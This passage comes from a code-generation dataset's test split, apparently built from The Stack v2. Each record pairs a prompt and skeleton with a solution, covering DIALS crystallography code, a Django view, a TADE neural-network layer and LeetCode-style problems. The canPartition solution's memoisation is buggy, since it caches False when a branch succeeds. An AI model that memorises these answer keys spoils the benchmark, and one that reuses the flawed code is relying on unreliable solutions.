Params: reflections The list of reflections experiment The experiment object\"\"\"\n <|body_0|>\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n <|body_1|>\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FractionOfObservedIntensity:\n \"\"\"Calculate the fraction of observed intensity for different sigma_m.\"\"\"\n\n def __init__(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Initialise the algorithm. Calculate the list of tau and zetas. Params: reflections The list of reflections experiment The experiment object\"\"\"\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n\n def _calculate_tau_and_zeta(self, crystal, beam, detector, goniometer, scan, reflections):\n \"\"\"Calculate the list of tau and zeta needed for the calculation. Params: reflections The list of reflections experiment The experiment object. Returns: (list of tau, list of zeta)\"\"\"\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n tau = []\n zeta2 = []\n for s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\n return (flex.double(tau), flex.double(zeta2))\n\n def __call__(self, sigma_m):\n \"\"\"Calculate the fraction of observed intensity for each observation. 
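On the FractionOfObservedIntensity record above: the __call__ body evaluates R = (erf(e1/sigma_m) - erf(e2/sigma_m)) / 2 elementwise on flex arrays, clamps R away from zero at TINY = 1e-10, and returns log R. A scalar sketch of the same formula using only the standard library (the input values are illustrative, not from the record):

import math

TINY = 1e-10

def log_fraction(e1: float, e2: float, sigma_m: float) -> float:
    # R = (erf(e1/sigma) - erf(e2/sigma)) / 2, clamped away from zero
    # so the logarithm stays finite, mirroring the flex-array version.
    assert sigma_m > TINY
    r = (math.erf(e1 / sigma_m) - math.erf(e2 / sigma_m)) / 2.0
    return math.log(max(r, TINY))

# Close to log(1) = 0 when the reflection is fully covered by the scan slice:
print(log_fraction(0.02, -0.02, 0.01))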
Params: sigma_m The mosaicity Returns: A list of log intensity fractions\"\"\"\n TINY = 1e-10\n assert sigma_m > TINY\n a = scitbx.math.erf(self.e1 / sigma_m)\n b = scitbx.math.erf(self.e2 / sigma_m)\n R = (a - b) / 2.0\n assert R.all_ge(0)\n mask = R < TINY\n assert mask.count(True) < len(mask)\n R.set_selected(mask, TINY)\n return flex.log(R)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/dials/algorithms/profile_model/gaussian_rs/calculator.py", "source_repo": "dials/dials", "split": "test", "star_events_count": 71} {"blob_id": "74c3e2c43f3f20d49f0ae7c0a3b52991d3bc92d2", "bodies": ["cache = {}\n\ndef helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\nif not nums:\n return True\ns = sum(nums)\nif s % 2 != 0:\n return False\nreturn helper(nums, 0, s / 2)", "s = sum(nums)\nif s % 2 != 0:\n return False\ndp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\nfor i in xrange(len(nums) + 1):\n dp[0][i] = True\nfor i in range(1, s / 2 + 1):\n dp[i][0] = False\nfor i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\nreturn dp[-1][-1]"], "bodies_text": "<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). 
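On the canPartition record beginning above: the memoised helper in the first body is buggy. A cache hit always returns False, yet cache[i, k] = False is written precisely when include_curr is True, so states that can reach the target get recorded as unreachable and later lookups give wrong answers; the code also relies on Python 2 semantics (xrange, and s / 2 as the integer target). A corrected Python 3 sketch of the same top-down idea (function names are mine):

from functools import lru_cache

def can_partition(nums) -> bool:
    total = sum(nums)
    if total % 2:
        return False

    @lru_cache(maxsize=None)
    def reachable(i: int, k: int) -> bool:
        # Can some subset of nums[i:] sum exactly to k?
        if k == 0:
            return True
        if i >= len(nums) or k < 0:
            return False
        # Either take nums[i] or skip it; lru_cache stores the true result.
        return reachable(i + 1, k - nums[i]) or reachable(i + 1, k)

    return reachable(0, total // 2)

print(can_partition([1, 5, 11, 5]))  # True  (11 vs 1 + 5 + 5)
print(can_partition([1, 2, 3, 5]))   # False (odd total)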
If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000217", "length_bytes": 2382, "license_type": "no_license", "methods": [{"docstring": "This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "name": "canPartition", "signature": "def canPartition(self, nums)"}, {"docstring": "This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "name": "canPartitionIter", "signature": "def canPartitionIter(self, nums)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000726", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canPartition(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n- def canPartitionIter(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canPartition(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). 
If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n- def canPartitionIter(self, nums): This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\n\n<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n<|end_body_0|>\n\n<|body_start_1|>\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n<|end_body_1|>\n", "revision_id": "b7c22210c2a892b51a3397e51095614ea6fe5d8a", "skeleton": "<|skeleton|>\nclass Solution:\n\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_0|>\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def canPartition(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). 
If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n cache = {}\n\n def helper(nums, i, k):\n if (i, k) in cache:\n return False\n if i >= len(nums):\n return False\n if k == 0:\n return True\n include_curr = helper(nums, i + 1, k - nums[i])\n exclude_curr = helper(nums, i + 1, k)\n if include_curr:\n cache[i, k] = False\n return include_curr or exclude_curr\n if not nums:\n return True\n s = sum(nums)\n if s % 2 != 0:\n return False\n return helper(nums, 0, s / 2)\n\n def canPartitionIter(self, nums):\n \"\"\"This problem is essentially a \"subset sum to K\" problem. But here the target is K/2 (where K = sum of elements of nums). If there's a subset of `nums` that sums to sum(nums) / 2, then it means that the other half of `nums` also sums to sum(nums) / 2, unless sum(nums) is odd, in which case we can just return False.\"\"\"\n s = sum(nums)\n if s % 2 != 0:\n return False\n dp = [[None for _ in xrange(len(nums) + 1)] for _ in xrange(s / 2 + 1)]\n for i in xrange(len(nums) + 1):\n dp[0][i] = True\n for i in range(1, s / 2 + 1):\n dp[i][0] = False\n for i in xrange(1, s / 2 + 1):\n for j in xrange(1, len(nums) + 1):\n target = i - nums[j - 1]\n if target < 0:\n dp[i][j] = dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1] or dp[target][j - 1]\n return dp[-1][-1]\n", "source": "the_stack_v2_python_sparse", "source_path": "recursion/partition_equal_subset_sum.py", "source_repo": "manthan787/algo-practice", "split": "test", "star_events_count": 1} {"blob_id": "0cb010fec95294db88560c917b9bb2ec7568225b", "bodies": ["form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\nform.instance.type = 'ND'\nreturn super().form_valid(form)", "context = super().get_context_data(**kwargs)\ncontext['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\nreturn context"], "bodies_text": "<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "class_docstring": "Class based view for reporting noodles", "class_name": "NoodleReportForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000218", "length_bytes": 10733, "license_type": "permissive", "methods": [{"docstring": "Ensures hidden form values are filled", "name": "form_valid", "signature": "def form_valid(self, form)"}, {"docstring": "Passes item name to template", "name": "get_context_data", "signature": "def get_context_data(self, **kwargs)"}], "n_methods": 2, "original_id": 
"stack_v2_sparse_classes_30k_train_002185", "prompt": "Implement the Python class `NoodleReportForm` described below.\n\nClass description:\nClass based view for reporting noodles\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template", "prompted_full_text": "Implement the Python class `NoodleReportForm` described below.\n\nClass description:\nClass based view for reporting noodles\n\nMethod signatures and docstrings:\n- def form_valid(self, form): Ensures hidden form values are filled\n- def get_context_data(self, **kwargs): Passes item name to template\n\n<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n<|end_body_0|>\n\n<|body_start_1|>\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n<|end_body_1|>\n", "revision_id": "6bf8e75a1f279ac584daa4ee19927ffccaa67551", "skeleton": "<|skeleton|>\nclass NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n <|body_0|>\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NoodleReportForm:\n \"\"\"Class based view for reporting noodles\"\"\"\n\n def form_valid(self, form):\n \"\"\"Ensures hidden form values are filled\"\"\"\n form.instance.noodle = Noodle.objects.get(pk=self.kwargs['id'])\n form.instance.type = 'ND'\n return super().form_valid(form)\n\n def get_context_data(self, **kwargs):\n \"\"\"Passes item name to template\"\"\"\n context = super().get_context_data(**kwargs)\n context['name'] = Noodle.objects.get(pk=self.kwargs['id']).name\n return context\n", "source": "the_stack_v2_python_sparse", "source_path": "rameniaapp/views/report.py", "source_repo": "awlane/ramenia", "split": "test", "star_events_count": 0} {"blob_id": "ec53f19c80eb1e296e12949fc45f5cd3af31f792", "bodies": ["super().__init__()\nself.norm = torch.nn.InstanceNorm1d(in_channels)\nself.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\nself.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\nself.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)", "x = self.norm(x)\nc = self.upsample(c)\nc = self.aux_conv(c)\ncg = self.gated_conv(c)\ncg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\ny = cg1 * self.upsample(x) + cg2\nreturn (y, c)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, 
padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "class_docstring": "TADE Layer module.", "class_name": "TADELayer", "detected_licenses": ["MIT", "LicenseRef-scancode-proprietary-license", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000219", "length_bytes": 4805, "license_type": "permissive", "methods": [{"docstring": "Initilize TADE layer.", "name": "__init__", "signature": "def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest')"}, {"docstring": "Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).", "name": "forward", "signature": "def forward(self, x, c)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005447", "prompt": "Implement the Python class `TADELayer` described below.\n\nClass description:\nTADE Layer module.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'): Initilize TADE layer.\n- def forward(self, x, c): Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). 
Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).", "prompted_full_text": "Implement the Python class `TADELayer` described below.\n\nClass description:\nTADE Layer module.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'): Initilize TADE layer.\n- def forward(self, x, c): Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\n\n<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "revision_id": "c68b4590ab20eaf55e0b96b82325a90177fffd5c", "skeleton": "<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. 
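On the TADELayer record above: the skeleton declares class TADELayer: with no base class, yet __init__ calls super().__init__() and registers torch submodules, so the extracted class only runs with the torch.nn.Module base from the upstream ParallelWaveGAN repository restored. A shape check under that assumption (the Sequential wrappers are dropped for brevity; batch and length values are illustrative):

import torch

class TADELayer(torch.nn.Module):  # nn.Module base restored; the skeleton omits it
    def __init__(self, in_channels=64, aux_channels=80, kernel_size=9,
                 bias=True, upsample_factor=2, upsample_mode="nearest"):
        super().__init__()
        self.norm = torch.nn.InstanceNorm1d(in_channels)
        self.aux_conv = torch.nn.Conv1d(aux_channels, in_channels, kernel_size,
                                        1, bias=bias, padding=(kernel_size - 1) // 2)
        self.gated_conv = torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size,
                                          1, bias=bias, padding=(kernel_size - 1) // 2)
        self.upsample = torch.nn.Upsample(scale_factor=upsample_factor,
                                          mode=upsample_mode)

    def forward(self, x, c):
        x = self.norm(x)
        c = self.aux_conv(self.upsample(c))
        # Split the doubled channels into a multiplicative and an additive map.
        gamma, beta = self.gated_conv(c).split(c.size(1), dim=1)
        return gamma * self.upsample(x) + beta, c

layer = TADELayer()
y, c = layer(torch.randn(2, 64, 50), torch.randn(2, 80, 50))
print(y.shape, c.shape)  # torch.Size([2, 64, 100]) torch.Size([2, 64, 100])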
Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n", "source": "the_stack_v2_python_sparse", "source_path": "parallel_wavegan/layers/tade_res_block.py", "source_repo": "kan-bayashi/ParallelWaveGAN", "split": "test", "star_events_count": 1405} {"blob_id": "c55368d7f7f25a9f08c079abd77c5f4db0d74b50", "bodies": ["array = [head]\nwhile array[-1].next:\n array.append(array[-1].next)\nreturn array[len(array) // 2]", "n, cur = (0, head)\nwhile cur:\n n += 1\n cur = cur.next\nk, cur = (0, head)\nwhile k < n // 2:\n k += 1\n cur = cur.next\nreturn cur", "fast = slow = head\nwhile fast and fast.next:\n slow = slow.next\n fast = fast.next.next\nreturn slow"], "bodies_text": "<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n 